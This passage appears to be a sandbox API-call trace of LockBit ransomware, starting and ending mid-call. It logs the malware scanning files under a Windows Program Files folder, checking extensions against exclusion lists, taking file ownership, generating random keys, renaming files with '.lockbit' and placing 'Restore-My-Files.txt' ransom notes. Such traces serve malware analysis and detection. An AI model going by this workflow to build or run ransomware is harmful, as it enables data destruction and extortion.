lpString2=".png") returned 1 [0081.784] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.784] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.784] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png.lockbit") returned 86 [0081.784] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.785] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.785] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.785] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.785] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.785] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.786] RtlFreeAnsiString (AnsiString="\\") [0081.786] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.786] malloc (_Size=0x200) returned 0x77d800 [0081.786] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.786] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.786] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.786] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.786] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.787] CloseHandle (hObject=0x3c4) returned 1 [0081.787] free (_Block=0x77d800) [0081.787] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-highlight.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.787] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.787] malloc (_Size=0x40068) returned 0x1ff1e60 [0081.787] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3122) returned 1 [0081.787] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.788] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.788] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0081.788] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.789] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.789] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0081.789] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0081.799] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.799] malloc (_Size=0xc2) returned 0x77d800 [0081.799] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc2, FileInformationClass=0xa) returned 0xc0000008 [0081.799] free (_Block=0x77d800) [0081.799] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-highlight.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.799] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.799] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.799] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71123769, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x71123769, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x578, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-image-mask.png", cAlternateFileName="")) returned 1 [0081.799] lstrcmpiW (lpString1=".", lpString2="16_9-frame-image-mask.png") returned -1 [0081.799] lstrcmpiW (lpString1="..", lpString2="16_9-frame-image-mask.png") returned -1 [0081.799] PathFindExtensionW (pszPath="16_9-frame-image-mask.png") returned=".png" [0081.799] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.800] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.800] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.800] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.800] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.801] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.801] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.801] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.801] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.801] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.801] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.801] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.801] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.801] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-image-mask.png") returned 1 [0081.801] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-image-mask.png") returned 1 [0081.802] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-image-mask.png") returned 1 [0081.802] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-image-mask.png") returned 1 [0081.802] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-image-mask.png") returned 1 [0081.802] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-image-mask.png") returned 1 [0081.802] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-image-mask.png") returned 1 [0081.802] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.802] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png") returned=".png" [0081.802] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.802] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.802] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.802] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.803] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.803] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.803] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.803] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.803] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.803] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.803] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.803] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.803] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.803] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.803] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.803] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png.lockbit") returned 87 [0081.803] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.804] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.804] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.804] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.804] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.805] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.805] RtlFreeAnsiString (AnsiString="\\") [0081.805] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.805] malloc (_Size=0x200) returned 0x77d800 [0081.805] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.805] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.805] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0081.805] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.805] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0081.806] CloseHandle (hObject=0x3c4) returned 1 [0081.806] free (_Block=0x77d800) [0081.806] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-image-mask.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0081.806] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0081.806] malloc (_Size=0x40068) returned 0x1ff1e60 [0081.806] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=1400) returned 1 [0081.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.807] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0081.807] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0081.807] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0081.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0081.807] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0081.818] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0081.818] malloc (_Size=0xc4) returned 0x77d800 [0081.818] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0081.818] free (_Block=0x77d800) [0081.818] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-image-mask.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories") returned 1 [0081.818] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt") returned 74 [0081.818] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.819] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x711498c6, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x711498c6, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4d1bc651, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c12, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-overlay.png", cAlternateFileName="")) returned 1 [0081.819] lstrcmpiW (lpString1=".", lpString2="16_9-frame-overlay.png") returned -1 [0081.819] lstrcmpiW (lpString1="..", lpString2="16_9-frame-overlay.png") returned -1 [0081.819] PathFindExtensionW (pszPath="16_9-frame-overlay.png") returned=".png" [0081.819] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0081.819] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0081.819] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0081.820] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0081.820] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0081.820] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0081.820] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0081.820] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0081.820] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0081.820] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0081.820] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0081.820] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0081.821] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0081.821] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="16_9-frame-overlay.png") returned 1 [0081.821] lstrcmpiW (lpString1="ntldr", lpString2="16_9-frame-overlay.png") returned 1 [0081.821] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="16_9-frame-overlay.png") returned 1 [0081.821] lstrcmpiW (lpString1="bootsect.bak", lpString2="16_9-frame-overlay.png") returned 1 [0081.821] lstrcmpiW (lpString1="autorun.inf", lpString2="16_9-frame-overlay.png") returned 1 [0081.821] lstrcmpiW (lpString1="thumbs.db", lpString2="16_9-frame-overlay.png") returned 1 [0081.821] lstrcmpiW (lpString1="iconcache.db", lpString2="16_9-frame-overlay.png") returned 1 [0081.821] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\") returned="" [0081.821] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png") returned=".png" [0081.821] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0081.821] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0081.821] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0081.821] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0081.822] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0081.822] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0081.822] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0081.822] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0081.822] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0081.822] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0081.822] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0081.822] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0081.822] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png.lockbit") returned 84 [0081.822] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Memories\\16_9-frame-overlay.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\memories\\16_9-frame-overlay.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0081.823] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0081.823] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0081.823] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0081.824] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0081.824] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0081.824] RtlFreeAnsiString (AnsiString="\\") [0081.824] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0081.824] malloc (_Size=0x200) returned 0x77d800 [0081.824] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0081.824] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: 